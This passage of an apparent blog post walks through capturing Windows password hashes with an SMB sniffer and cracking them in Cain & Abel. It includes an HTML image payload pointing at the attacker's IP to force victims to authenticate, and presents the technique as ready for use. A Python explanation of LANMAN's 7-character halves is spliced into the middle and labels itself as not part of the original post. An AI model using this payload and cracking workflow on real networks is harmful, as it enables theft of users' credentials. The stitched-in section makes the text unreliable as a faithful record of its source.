That future purpose is now documented!
Step 1 - Download my slightly updated version from here and place it in your exploits/ directory.
Step 2a - Run it with root privs on a UNIX host (doesn't work on Windows, sorry).
Step 2b - Have a Windows machine connect to your "share" - they will get an access denied but stuff like `<img src="\\yourip\share\bad.gif">`
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiq_b1ZHL8i8cDyBG277xHseHpQSR1r2aneTqw268quwtFJbU_Wv7FDmGNyB5oYyoKAU6ELCQK5UB2D8q-K86jzHt077IexyJHjOb5T_kKKWJHZBneEG5Q2XaatrHfcbDVqeQilIg/s400/framework-27-smbsniffer.png)
Step 3 - Send the hashes to Cain & Abel for cracking or cryptanalysis! Obtain the HALFLMCHALL tables from FreeRainbowCrack.Com or run a brute force, dictionary, hybrid, etc.
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEipX0R1CLR42ffbZNdOVIgfWQtWSMMATnMuitmFyi58ylzwJn_Amv9bSSiADqmB-Li2bhQEUGGxTbcW0PVTP-z_2-KxprEgInrtn2crbzizVqkuwd3_1OIQ4wZqvoILQKlAzfkFqQ/s400/cain-addlmchall.png)
Step 4 - Success!
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi5gNnww5GbH9-Z2vdB76Bg_OgkvXeDO6gz0t7n21s5fRfxNOiBxvxoUv8veABFvNG80B7suA9ic2K2v7kqbv2szu-sGPJeVdYDMnVp49Hotb4QkBooWfEYtXfMZWbQwB-RVUNbCA/s400/cain-success-lmchall.png)
One caveat -- the half-lm challenge table only does the first 7 characters of LANMAN. You still have to brute force the last 7 and if the user's password is greater than 14 characters, you're really out of luck.
Enjoy! :)
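The caveat about the first 7 and last 7 characters follows from how LANMAN prepares a password before hashing. The Python below is an added example, not code from the original post or from the tools it uses. `lm_halves`, `lm_exposure` and `charset_size` are hypothetical names, the input is assumed to be ASCII, and no hashing is performed.

```python
LM_MAX = 14   # LANMAN only considers 14 characters
HALF = 7      # each 7-byte half is hashed on its own

def lm_halves(password):
    """Return the two 7-byte blocks LANMAN hashes separately, or None
    when the password is longer than 14 characters (no usable LM hash)."""
    if len(password) > LM_MAX:
        return None
    # Case is folded away and the value is NUL-padded to 14 bytes.
    # Assumption: ASCII-only input; real systems use the OEM code page.
    raw = password.upper().encode("ascii").ljust(LM_MAX, b"\x00")
    return raw[:HALF], raw[HALF:]

def lm_exposure(password, charset_size=69):
    """Summarise what a defender should assume about this password.
    charset_size is an assumed count of upper-case letters, digits and
    symbols; it is a parameter of this example, not a figure from the post."""
    halves = lm_halves(password)
    if halves is None:
        return {"lm_derived": False}
    first, second = halves
    # Worst-case guesses for one half: every string of length 0..7.
    per_half = sum(charset_size ** n for n in range(HALF + 1))
    # The same count if all 14 characters were hashed as a single unit.
    as_one = sum(charset_size ** n for n in range(LM_MAX + 1))
    return {
        "lm_derived": True,
        "first_half": first,     # the part a first-7-characters table covers
        "second_half": second,   # the part that still has to be searched
        "second_half_empty": second == b"\x00" * HALF,
        "guesses_split": 2 * per_half,
        "guesses_unsplit": as_one,
    }

if __name__ == "__main__":
    # Constructed sample passwords, for illustration only.
    for pw in ("secret", "Password123", "a-much-longer-passphrase"):
        print(pw, lm_exposure(pw))
```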
3 comments:
See you're still at it, eh? ;-) greetings programs - smj@sdf
Of course! We're all addicts of one thing or another. :)
greetings programs -